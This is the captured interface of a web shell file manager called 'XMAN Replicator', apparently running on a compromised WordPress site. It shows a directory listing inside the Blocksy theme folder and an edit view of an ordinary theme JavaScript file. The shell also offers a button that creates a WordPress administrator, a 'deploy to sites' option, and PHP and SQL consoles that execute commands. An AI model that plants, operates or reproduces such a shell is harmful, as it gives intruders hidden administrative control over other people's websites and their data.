🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
vestsxzf
/
public_html
/
wp-content
/
themes
/
blocksy
/
static
/
js
/
customizer
/
sync
/
woocommerce
/
loop
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-03-27 10:28
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-03-27 10:28
🔄
🗑️
🗑️📁
⬇️
🔒
loop-start.js
395 B
-rw-r--r--
2026-03-27 10:28
✏️
🔄
🗑️
⬇️
🔒
Edit: loop-start.js
import { watchOptionsWithPrefix } from '../../helpers' import { replaceCards } from '../archive-product' watchOptionsWithPrefix({ getOptionsForPrefix: () => ['shop_structure', 'shop_columns'], render: () => { ;[...document.querySelectorAll('.shop-entries')].map((el) => { const structure = wp.customize('shop_structure')() el.dataset.layout = structure }) replaceCards() }, })
Save
PHP Console
Execute
SQL Console
Execute